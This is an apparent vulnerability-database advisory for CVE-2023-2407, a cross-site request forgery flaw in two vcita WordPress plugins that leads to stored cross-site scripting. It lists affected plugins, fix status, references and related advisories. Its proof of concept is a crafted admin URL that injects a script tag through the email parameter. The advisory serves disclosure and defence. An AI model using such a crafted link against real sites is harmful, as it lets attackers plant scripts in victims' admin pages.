Multiple plugins by vcita – CSRF to Stored XSS in settings page | CVE 2023-2407 | Plugin Vulnerabilities

Description

The plugin does not protect the live-site-parse-vcita-callback settings page against CSRF attacks, allowing an unauthenticated attacker to inject arbitrary web scripts by tricking a logged in user with contributor role or higher to click a link.

Proof of Concept

https://example.com/wp-admin/admin.php?page=live-site-parse-vcita-callback&success=true&uid=a&first_name=a&last_name=b&title=c&confirmation_token=d&confirmed=true&engage_delay=1&implementation_key=1&email=a“/><script>alert(1);</script>

Affects Plugins

event-registration-calendar-by-vcita

No known fix

paypal-payment-button-by-vcita

Fixed in 3.20.0

References

CVE

URL

https://blog.jonh.eu/blog/security-vulnerabilities-in-wordpress-plugins-by-vcita

URL

https://plugins.trac.wordpress.org/browser/paypal-payment-button-by-vcita/trunk/system/parse_vcita_callback.php#L55

URL

https://plugins.trac.wordpress.org/browser/event-registration-calendar-by-vcita/trunk/system/parse_vcita_callback.php#L55

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Jonas Höbenreich

Verified

No

WPVDB ID

883c0425-9b18-4f52-8956-5264b8f12b99

Timeline

Publicly Published

2023-06-02 (about 2 years ago)

Added

2023-06-04 (about 2 years ago)

Last Updated

2025-04-29 (about 1 year ago)

Other

Published

Title

Published

2025-04-02

Title

Web Directory Free < 1.7.8 - Cross-Site Request Forgery to Stored Cross-Site Scripting

Published

2025-11-03

Title

WP Global Screen Options <= 0.2 - Cross-Site Request Forgery to Screen Options Update

Published

2024-05-29

Title

AffiEasy < 1.1.7 - Cross-Site Request Forgery to Various Actions

Published

2025-08-22

Title

JobWP < 2.4.4 - Cross-Site Request Forgery

Published

2023-10-16

Title

Who Hit The Page – Hit Counter <= 1.4.14.3 - CSRF